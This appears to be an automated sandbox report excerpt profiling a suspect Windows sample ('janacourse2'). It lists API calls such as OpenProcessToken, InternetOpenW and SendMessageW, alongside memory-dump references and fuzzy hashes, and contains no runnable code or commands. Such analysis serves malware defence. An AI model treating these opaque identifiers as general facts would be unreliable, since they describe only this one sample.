                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 2710830443-0
                                                                                                            • Opcode ID: 784a6bc2d38f3e505bfcbcbfa28627b810f0e1ce171b2490000b996d1d2d7fd2
                                                                                                            • Instruction ID: 7fb38b95315b62ce6a25278acd260c9f15f0784aa1f0863e9d20391e360a60dd
                                                                                                            • Opcode Fuzzy Hash: 784a6bc2d38f3e505bfcbcbfa28627b810f0e1ce171b2490000b996d1d2d7fd2
                                                                                                            • Instruction Fuzzy Hash: EDE092B52022287BE7302BB6DE4DFEB3E6CEF47BA1F504015F245D10849AAAD440C7B0
                                                                                                            APIs
                                                                                                              • Part of subcall function 00FC9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00FC9693
                                                                                                              • Part of subcall function 00FC9639: SelectObject.GDI32(?,00000000), ref: 00FC96A2
                                                                                                              • Part of subcall function 00FC9639: BeginPath.GDI32(?), ref: 00FC96B9
                                                                                                              • Part of subcall function 00FC9639: SelectObject.GDI32(?,00000000), ref: 00FC96E2
                                                                                                            • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 01048887
                                                                                                            • LineTo.GDI32(?,?,?), ref: 01048894
                                                                                                            • EndPath.GDI32(?), ref: 010488A4
                                                                                                            • StrokePath.GDI32(?), ref: 010488B2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                            • String ID:
                                                                                                            • API String ID: 1539411459-0
                                                                                                            • Opcode ID: c1e001fb0c2e9ff399bfba9f80a5d87d0a4b60113d5ca1e8fb4cf920377de1f5
                                                                                                            • Instruction ID: 9b220b6bcb86f9099422d7b023e196a032713acefdf5aabc2e42c49ed7f7ca50
                                                                                                            • Opcode Fuzzy Hash: c1e001fb0c2e9ff399bfba9f80a5d87d0a4b60113d5ca1e8fb4cf920377de1f5
                                                                                                            • Instruction Fuzzy Hash: E3F09A3A006258BBFB221E94AE4AFCE3E59AF06310F008104FA81610D5C3BA1111DBA9
                                                                                                            APIs
                                                                                                            • GetSysColor.USER32(00000008), ref: 00FC98CC
                                                                                                            • SetTextColor.GDI32(?,?), ref: 00FC98D6
                                                                                                            • SetBkMode.GDI32(?,00000001), ref: 00FC98E9
                                                                                                            • GetStockObject.GDI32(00000005), ref: 00FC98F1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Color$ModeObjectStockText
                                                                                                            • String ID:
                                                                                                            • API String ID: 4037423528-0
                                                                                                            • Opcode ID: cb9fa8452e26f173f1c2c939a5a900700d37a57ee5d4203fdd2f7247f8ac7f1a
                                                                                                            • Instruction ID: c2fc687cc1839e08fe3ed32557d9478eebb87903e06d3ceac991a4600208973c
                                                                                                            • Opcode Fuzzy Hash: cb9fa8452e26f173f1c2c939a5a900700d37a57ee5d4203fdd2f7247f8ac7f1a
                                                                                                            • Instruction Fuzzy Hash: 5DE06575641280ABFB315B78AA49BD83F60AB06336F048259F7F5540E4C7B642409B10
                                                                                                            APIs
                                                                                                            • GetCurrentThread.KERNEL32 ref: 01011634
                                                                                                            • OpenThreadToken.ADVAPI32(00000000,?,?,?,010111D9), ref: 0101163B
                                                                                                            • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,010111D9), ref: 01011648
                                                                                                            • OpenProcessToken.ADVAPI32(00000000,?,?,?,010111D9), ref: 0101164F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrentOpenProcessThreadToken
                                                                                                            • String ID:
                                                                                                            • API String ID: 3974789173-0
                                                                                                            • Opcode ID: bf55e993bb49c27173cda6243d5fc7e87d8f73b2dd94bd734240346322a278c7
                                                                                                            • Instruction ID: 9c521d2cded0ec42934e5f3b918ac1c44d1bf6096d42b0f8732f9de3863406fd
                                                                                                            • Opcode Fuzzy Hash: bf55e993bb49c27173cda6243d5fc7e87d8f73b2dd94bd734240346322a278c7
                                                                                                            • Instruction Fuzzy Hash: 0EE04FB5602211ABE7701BB49F4DB463BA9AF45792F144848F6C5C9088D67E40408B50
                                                                                                            APIs
                                                                                                            • GetDesktopWindow.USER32 ref: 0100D858
                                                                                                            • GetDC.USER32(00000000), ref: 0100D862
                                                                                                            • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0100D882
                                                                                                            • ReleaseDC.USER32(?), ref: 0100D8A3
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 2889604237-0
                                                                                                            • Opcode ID: 997f7d28c0dc56e3be2b7b4d296249d5349494549b9e2f3677804c1eeda72456
                                                                                                            • Instruction ID: 7dfe05cf41499458f910e43eb90b1027f938273680acac27d93ee9a698fef8ec
                                                                                                            • Opcode Fuzzy Hash: 997f7d28c0dc56e3be2b7b4d296249d5349494549b9e2f3677804c1eeda72456
                                                                                                            • Instruction Fuzzy Hash: 28E01AB9801205EFEB619FE0D748A6DBBB5FB08310F108059F886E7244C73D9901AF50
                                                                                                            APIs
                                                                                                            • GetDesktopWindow.USER32 ref: 0100D86C
                                                                                                            • GetDC.USER32(00000000), ref: 0100D876
                                                                                                            • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0100D882
                                                                                                            • ReleaseDC.USER32(?), ref: 0100D8A3
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 2889604237-0
                                                                                                            • Opcode ID: 2ea62e0a516a67e57bc340ace9ee01c0de0d3ca8033557ff59e07c581227fc5f
                                                                                                            • Instruction ID: 1e5bae6236f86ffd2f36232a835b105f6f7d93434fe2f09f3c768157cb1faa1d
                                                                                                            • Opcode Fuzzy Hash: 2ea62e0a516a67e57bc340ace9ee01c0de0d3ca8033557ff59e07c581227fc5f
                                                                                                            • Instruction Fuzzy Hash: D7E01AB9801200EFDB609FA0D64866DBBB5BB08310B108048F886E7244C73D6901AF50
                                                                                                            APIs
                                                                                                              • Part of subcall function 00FB7620: _wcslen.LIBCMT ref: 00FB7625
                                                                                                            • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 01024ED4
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Connection_wcslen
                                                                                                            • String ID: *$LPT
                                                                                                            • API String ID: 1725874428-3443410124
                                                                                                            • Opcode ID: 569067f7d4b46176d8dde7f8ac19568e85db201c5b2da51b68745cc89dd9aa5e
                                                                                                            • Instruction ID: 7cdf273daea9bcae447d19b69b19399fbb198939ad3bf8dd84f63fcd0faa149c
                                                                                                            • Opcode Fuzzy Hash: 569067f7d4b46176d8dde7f8ac19568e85db201c5b2da51b68745cc89dd9aa5e
                                                                                                            • Instruction Fuzzy Hash: 25918F75A00214DFDB54DF58C884EAABBF1AF84304F1980D9E84A9F7A2C735ED85CB90
                                                                                                            APIs
                                                                                                            • __startOneArgErrorHandling.LIBCMT ref: 00FDE30D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorHandling__start
                                                                                                            • String ID: pow
                                                                                                            • API String ID: 3213639722-2276729525
                                                                                                            • Opcode ID: f134f98ed10e371fd9fc16c70389214544497a6201d4b547d27bc357ed6c68ed
                                                                                                            • Instruction ID: cafb5e04ff3270b391f75c1728e7a02bced3ec772ca8f66805223828c61c0b49
                                                                                                            • Opcode Fuzzy Hash: f134f98ed10e371fd9fc16c70389214544497a6201d4b547d27bc357ed6c68ed
                                                                                                            • Instruction Fuzzy Hash: 25518E72E0C34296CB257615CD0137A3F99EF40761F3849AAE0D54A3DCEB398C85BB86
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: #
                                                                                                            • API String ID: 0-1885708031
                                                                                                            • Opcode ID: dcf6f54525e3142539cbe5a69f86cac69102e0d4a10b0bd73fe96b6ffcb71075
                                                                                                            • Instruction ID: 3edd4ee39237810f05895337463b6c5679352c9ce5e6c0ac2968024e1ab5f9e0
                                                                                                            • Opcode Fuzzy Hash: dcf6f54525e3142539cbe5a69f86cac69102e0d4a10b0bd73fe96b6ffcb71075
                                                                                                            • Instruction Fuzzy Hash: 96515575904206DFEB26DF28C482BFA7BE8FF55310F244499E8D5AB2C1D6389D42DB90
                                                                                                            APIs
                                                                                                            • Sleep.KERNEL32(00000000), ref: 00FCF2A2
                                                                                                            • GlobalMemoryStatusEx.KERNEL32(?), ref: 00FCF2BB
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: GlobalMemorySleepStatus
                                                                                                            • String ID: @
                                                                                                            • API String ID: 2783356886-2766056989
                                                                                                            • Opcode ID: 0372b86c89331aaabf5276ff6c28a27151a4127d0eb076354c8af833471d6474
                                                                                                            • Instruction ID: 7fd7e6c8f42972ba3d3ce65beed095ed43f6a675697c8cc5e9b24282fa0d1e28
                                                                                                            • Opcode Fuzzy Hash: 0372b86c89331aaabf5276ff6c28a27151a4127d0eb076354c8af833471d6474
                                                                                                            • Instruction Fuzzy Hash: 865135715087449BE320AF11DC86BABBBF8FBC4340F81885DF1D982195EB758529CB66
                                                                                                            APIs
                                                                                                            • CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 010357E0
                                                                                                            • _wcslen.LIBCMT ref: 010357EC
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: BuffCharUpper_wcslen
                                                                                                            • String ID: CALLARGARRAY
                                                                                                            • API String ID: 157775604-1150593374
                                                                                                            • Opcode ID: 06a09f628ecc7bcffa58353d45a78c2545f942f8c768224209e61a485111a2b9
                                                                                                            • Instruction ID: b098f5e39e94e942aa95494edb138d6ab7ea39e8eb7e00ca791adb89b0204792
                                                                                                            • Opcode Fuzzy Hash: 06a09f628ecc7bcffa58353d45a78c2545f942f8c768224209e61a485111a2b9
                                                                                                            • Instruction Fuzzy Hash: E9419171E002099FCB14DFA9CD819FEBBF9FF89314F244069E545A7262E7749981CB90
                                                                                                            APIs
                                                                                                            • _wcslen.LIBCMT ref: 0102D130
                                                                                                            • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 0102D13A
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CrackInternet_wcslen
                                                                                                            • String ID: |
                                                                                                            • API String ID: 596671847-2343686810
APIs
• DestroyWindow.USER32(?,?,?,?), ref: 01043621
• MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 0104365C
Similarity
• API ID: Window$DestroyMove
• String ID: static
• API String ID: 2139405536-2160076837
APIs
• SendMessageW.USER32(?,00001132,00000000,?), ref: 0104461F
• SendMessageW.USER32(?,00001105,00000000,00000000), ref: 01044634
Similarity
• API ID: MessageSend
• String ID: '
• API String ID: 3850602802-1997036262
APIs
• SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0104327C
• SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 01043287
Similarity
• API ID: MessageSend
• String ID: Combobox
• API String ID: 3850602802-2096851135
APIs
  • Part of subcall function 00FB600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00FB604C
  • Part of subcall function 00FB600E: GetStockObject.GDI32(00000011), ref: 00FB6060
  • Part of subcall function 00FB600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 00FB606A
• GetWindowRect.USER32(00000000,?), ref: 0104377A
• GetSysColor.USER32(00000012), ref: 01043794
Similarity
• API ID: Window$ColorCreateMessageObjectRectSendStock
• String ID: static
• API String ID: 1983116058-2160076837
APIs
• InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0102CD7D
• InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 0102CDA6
Similarity
• API ID: Internet$OpenOption
• String ID: <local>
• API String ID: 942729171-4266983199
APIs
• GetWindowTextLengthW.USER32(00000000), ref: 010434AB
• SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 010434BA
Similarity
• API ID: LengthMessageSendTextWindow
• String ID: edit
• API String ID: 2978978980-2167791130
APIs
  • Part of subcall function 00FB9CB3: _wcslen.LIBCMT ref: 00FB9CBD
• CharUpperBuffW.USER32(?,?,?), ref: 01016CB6
• _wcslen.LIBCMT ref: 01016CC2
Similarity
• API ID: _wcslen$BuffCharUpper
• String ID: STOP
• API String ID: 1256254125-2411985666
APIs
  • Part of subcall function 00FB9CB3: _wcslen.LIBCMT ref: 00FB9CBD
  • Part of subcall function 01013CA7: GetClassNameW.USER32(?,?,000000FF), ref: 01013CCA
• SendMessageW.USER32(?,000001A2,000000FF,?), ref: 01011D4C
                                                                                                            Similarity
                                                                                                            • API ID: ClassMessageNameSend_wcslen
                                                                                                            • String ID: ComboBox$ListBox
                                                                                                            • API String ID: 624084870-1403004172
                                                                                                            • Opcode ID: 9e5962e0ed62a44ea0f2e5e7bcfd0d84cad9fd9d6f134b9ff907f9e9c3fd7e4e
                                                                                                            • Instruction ID: 32e435c1f07aa18dc5fe9eb55b9d9eeaf3595c0cc6c2738553610f1ac90e6511
                                                                                                            • Opcode Fuzzy Hash: 9e5962e0ed62a44ea0f2e5e7bcfd0d84cad9fd9d6f134b9ff907f9e9c3fd7e4e
                                                                                                            • Instruction Fuzzy Hash: 72014C7560121DABDB08FBB5CD50CFE77A8FF16350B400509EAB25B3C4EA785408CB60
                                                                                                            APIs
                                                                                                              • Part of subcall function 00FB9CB3: _wcslen.LIBCMT ref: 00FB9CBD
                                                                                                              • Part of subcall function 01013CA7: GetClassNameW.USER32(?,?,000000FF), ref: 01013CCA
                                                                                                            • SendMessageW.USER32(?,00000180,00000000,?), ref: 01011C46
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ClassMessageNameSend_wcslen
                                                                                                            • String ID: ComboBox$ListBox
                                                                                                            • API String ID: 624084870-1403004172
                                                                                                            • Opcode ID: 105daad3384d54212fd97df4528609b1f9c51c8c88b9183e5872d79dac8d453f
                                                                                                            • Instruction ID: 6165efef5180b51dbd4ac0fea15836bdf3945aaf224c26f7b8909480df1d4195
                                                                                                            • Opcode Fuzzy Hash: 105daad3384d54212fd97df4528609b1f9c51c8c88b9183e5872d79dac8d453f
                                                                                                            • Instruction Fuzzy Hash: 04012BB5B4110D67DB08EBA1CE51DFF77E8AF11340F100019AA8667285EA78AA08CBB1
                                                                                                            APIs
                                                                                                              • Part of subcall function 00FB9CB3: _wcslen.LIBCMT ref: 00FB9CBD
                                                                                                              • Part of subcall function 01013CA7: GetClassNameW.USER32(?,?,000000FF), ref: 01013CCA
                                                                                                            • SendMessageW.USER32(?,00000182,?,00000000), ref: 01011CC8
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ClassMessageNameSend_wcslen
                                                                                                            • String ID: ComboBox$ListBox
                                                                                                            • API String ID: 624084870-1403004172
                                                                                                            • Opcode ID: 154ec5c82e02fa67050165e17eed2522bac255d14ab5e2b2e19c6094bf1a1f05
                                                                                                            • Instruction ID: c1ad5b0d4f0e6b1f44263db6f2c237cc70d356874218d33019c6a4938ebfcef8
                                                                                                            • Opcode Fuzzy Hash: 154ec5c82e02fa67050165e17eed2522bac255d14ab5e2b2e19c6094bf1a1f05
                                                                                                            • Instruction Fuzzy Hash: 88012BB5A0011D67DF08E7A5CF41AFF77E8AB11340F100015AA8667285EA789A08CBB1
                                                                                                            APIs
                                                                                                              • Part of subcall function 00FB9CB3: _wcslen.LIBCMT ref: 00FB9CBD
                                                                                                              • Part of subcall function 01013CA7: GetClassNameW.USER32(?,?,000000FF), ref: 01013CCA
                                                                                                            • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 01011DD3
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
